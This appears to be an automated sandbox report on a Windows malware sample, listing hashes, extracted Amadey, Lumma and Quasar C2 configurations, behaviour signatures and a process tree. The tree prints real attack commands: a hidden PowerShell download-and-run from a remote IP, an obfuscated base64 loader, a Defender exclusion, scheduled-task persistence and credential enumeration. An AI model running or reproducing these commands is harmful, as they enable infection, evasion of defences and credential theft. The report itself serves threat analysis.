Analysis

  • max time kernel
    137s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/04/2025, 02:06

General

  • Target

    2025-04-02_190a8ab02b0b938ad8e82e929fd3a807_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    190a8ab02b0b938ad8e82e929fd3a807

  • SHA1

    f49237c0e29c473460db7743366dba9148bf6bbe

  • SHA256

    0542a3648fbaf85d180de040513d2d66b1af98ad3d9da310f71f839a49372c6c

  • SHA512

    0dd885dd9d125c8b08e7e9beb38a06f59654521f7f72a66f8d3df5027abf8c8d2c9164ec332c87b04840a407299dba582ff286db2806c9c8c5aee2bc278665ac

  • SSDEEP

    24576:DqDEvCTbMWu7rQYlBQcBiT6rprG8a09u:DTvC/MTQYxsWR7a09

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://ironloxp.live/aksdd

https://metalsyo.digital/opsa

https://anavstarx.shop/FoaJSi

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://rodformi.run/aUosoz

https://navstarx.shop/FoaJSi

https://wstarcloc.bet/GOksAo

https://atargett.top/dsANGt

https://6jmetalsyo.digital/opsa

https://qspacedbv.world/EKdlsk

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

    Run Powershell and hide display window.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 23 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Sets service image path in registry 2 TTPs 6 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 12 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 26 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Credentials from Password Stores: Windows Credential Manager 1 TTPs

    Suspicious access to Credentials History.

  • Deletes itself 1 IoCs
  • Drops startup file 4 IoCs
  • Executes dropped EXE 36 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
  • Loads dropped DLL 36 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads ssh keys stored on the system 2 TTPs

    Tries to access SSH used by SSH programs.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 24 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 14 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 2 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 53 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 30 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Kills process with taskkill 64 IoCs
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry class 9 IoCs
  • NTFS ADS 1 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 6 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2604
      • C:\Windows\SysWOW64\fontdrvhost.exe
        "C:\Windows\System32\fontdrvhost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:8796
    • C:\Users\Admin\AppData\Local\Temp\2025-04-02_190a8ab02b0b938ad8e82e929fd3a807_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
      "C:\Users\Admin\AppData\Local\Temp\2025-04-02_190a8ab02b0b938ad8e82e929fd3a807_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:1704
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn 7KqNzmaTI3s /tr "mshta C:\Users\Admin\AppData\Local\Temp\9TRMcALVg.hta" /sc minute /mo 25 /ru "Admin" /f
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4292
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn 7KqNzmaTI3s /tr "mshta C:\Users\Admin\AppData\Local\Temp\9TRMcALVg.hta" /sc minute /mo 25 /ru "Admin" /f
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:4692
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\9TRMcALVg.hta
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:412
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LNEWL4MMBHTBSLFMLJE3ZK5BRW88YMYO.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4240
          • C:\Users\Admin\AppData\Local\TempLNEWL4MMBHTBSLFMLJE3ZK5BRW88YMYO.EXE
            "C:\Users\Admin\AppData\Local\TempLNEWL4MMBHTBSLFMLJE3ZK5BRW88YMYO.EXE"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1388
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:4840
              • C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe
                "C:\Users\Admin\AppData\Local\Temp\10408830101\YGYZCmt.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:4156
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  7⤵
                    PID:1544
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4444
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
                  6⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:5052
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10409161121\5ym0ZYg.cmd"
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:3224
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                      8⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Drops startup file
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: AddClipboardFormatListener
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:4016
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                        9⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4736
                • C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe
                  "C:\Users\Admin\AppData\Local\Temp\10411030101\captcha.exe"
                  6⤵
                  • Executes dropped EXE
                  • Enumerates connected drives
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:4756
                  • C:\Windows\system32\cmd.exe
                    "cmd.exe" /c "dxdiag /t > \"C:\Users\Admin\AppData\Local\Temp\dxdiag_temp_139840732.txt\""
                    7⤵
                    • NTFS ADS
                    PID:1752
                  • C:\Windows\system32\net.exe
                    "net" statistics workstation
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1288
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 statistics workstation
                      8⤵
                        PID:1932
                    • C:\Windows\system32\vaultcmd.exe
                      "vaultcmd" /list
                      7⤵
                        PID:4156
                      • C:\Windows\system32\tasklist.exe
                        "tasklist"
                        7⤵
                        • Enumerates processes with tasklist
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5048
                      • C:\Windows\system32\tasklist.exe
                        "tasklist" /FO CSV /NH
                        7⤵
                        • Enumerates processes with tasklist
                        • Suspicious use of AdjustPrivilegeToken
                        PID:792
                      • C:\Windows\system32\tasklist.exe
                        "tasklist"
                        7⤵
                        • Enumerates processes with tasklist
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3412
                      • C:\Windows\system32\cmdkey.exe
                        "cmdkey" /list
                        7⤵
                          PID:4868
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
                          7⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4516
                          • C:\Windows\system32\cmdkey.exe
                            "C:\Windows\system32\cmdkey.exe" /list
                            8⤵
                              PID:1680
                          • C:\Windows\system32\certutil.exe
                            "certutil" -store My
                            7⤵
                              PID:1780
                            • C:\Windows\system32\tasklist.exe
                              "tasklist"
                              7⤵
                              • Enumerates processes with tasklist
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1572
                            • C:\Windows\system32\certutil.exe
                              "certutil" -store -user My
                              7⤵
                                PID:2996
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
                                7⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1940
                              • C:\Windows\system32\tasklist.exe
                                "tasklist"
                                7⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5036
                              • C:\Windows\system32\tasklist.exe
                                "tasklist"
                                7⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4376
                              • C:\Windows\system32\tasklist.exe
                                "tasklist"
                                7⤵
                                • Enumerates processes with tasklist
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4636
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  8⤵
                                    PID:5064
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
                                  7⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Hide Artifacts: Ignore Process Interrupts
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4188
                                  • C:\Windows\System32\Conhost.exe
                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    8⤵
                                      PID:1816
                                  • C:\Windows\system32\tasklist.exe
                                    "tasklist"
                                    7⤵
                                    • Enumerates processes with tasklist
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1680
                                  • C:\Windows\system32\cmdkey.exe
                                    "cmdkey" /list
                                    7⤵
                                      PID:5048
                                    • C:\Windows\system32\cmdkey.exe
                                      "cmdkey" /list:TERMSRV/69.48.201.74
                                      7⤵
                                        PID:980
                                      • C:\Windows\system32\tasklist.exe
                                        "tasklist"
                                        7⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4224
                                      • C:\Windows\system32\taskkill.exe
                                        "taskkill" /IM chrome.exe
                                        7⤵
                                        • Kills process with taskkill
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2012
                                      • C:\Windows\system32\tasklist.exe
                                        "tasklist"
                                        7⤵
                                        • Enumerates processes with tasklist
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2880
